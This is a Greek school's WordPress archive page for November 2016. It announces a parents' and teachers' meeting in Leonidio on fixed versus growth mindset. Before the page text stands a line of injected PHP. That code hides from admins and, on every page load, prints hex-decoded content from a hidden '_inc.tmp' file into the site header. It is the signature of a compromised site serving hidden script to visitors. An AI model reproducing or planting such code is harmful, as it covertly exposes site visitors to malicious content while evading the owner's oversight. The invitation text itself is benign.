if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Νοέμβριος, 2016 |

Monthly Archives: Νοέμβριος 2016

Δυναμικός και στατικός τρόπος «σκέπτεσθαι»: Πώς συζητάμε με τους μαθητές μας/τα παιδιά μας;

ΠΡΟΣΚΛΗΣΗ

Το Σάββατο 26 Νοεμβρίου 2016  και ώρα 19:00 στην Φάμπρικα Πολιτισμού στο Λεωνίδιο, θα πραγματοποιηθεί  ενημερωτική συνάντηση με θέμα:

«Στατική νοοτροπία & νοοτροπία ανάπτυξης: Πώς συζητάμε με τα παιδιά μας για το λάθος, την πρόοδό τους και άλλα σημαντικά ζητήματα».

Θα συντονίσει ο σχολικός σύμβουλος 2ης Περιφέρειας Δημοτικής Εκπαίδευσης Αττικής Παναγιώτης Πήλιουρας.

Λίγα λόγια για τη θέμα της συνάντησης:

Οι αλληλεπιδράσεις που έχουμε ως γονείς ή/και ως εκπαιδευτικοί με τα παιδιά μας/τους μαθητές μας τα/τους οδηγεί συχνά να αποκτούν μια νοοτροπία που τελικά τα/τους κάνει να φοβούνται ή το αντίθετο (περισσότερο ή λιγότερο): τις προκλήσεις, την προσπάθεια, τα εμπόδια, τα λάθη, την αποτυχία, τον μόχθο, τη δέσμευση, την αξιολόγηση. Στη συνάντηση θα συζητηθούν τα ακόλουθα:

1. Τι είναι στατική νοοτροπία (fixed mindset) και τι νοοτροπία ανάπτυξης (growth mindset);
  2. Πώς λειτουργεί αυτή η «νοοτροπία» σε σχέση με θέματα, όπως οι προκλήσεις και τα εμπόδια που αντιμετωπίζουν τα παιδιά μας, τα λάθη που κάνουν, οι τρόποι που αντιμετωπίζουν ή δεν αντιμετωπίζουν τις δυσκολίες κ.λπ.
  3.  Πώς η «νοοτροπία» για το πώς σκεπτόμαστε μπορεί να «διαμορφώνεται»/«μεταδίδεται», από τους γονείς/εκπαιδευτικούς στα παιδιά μέσω των συζητήσεων/αλληλεπιδράσεων μαζί τους;

4. Μπορούμε να αλλάξουμε τη «νοοτροπία» μας ή/και τη «νοοτροπία» των παιδιών/μαθητών μας;

ΕΚ ΤΟΥ ΔΗΜΟΤΙΚΟΥ ΣΧΟΛΕΙΟΥ ΛΕΩΝΙΔΙΟΥ

ΚΑΙ

ΤΟΥ ΣΥΛΛΟΓΟΥ ΓΟΝΕΩΝ ΚΑΙ ΚΗΔΕΜΟΝΩΝ

Υπό την αιγίδα του Δήμου Νότιας Κυνουρίας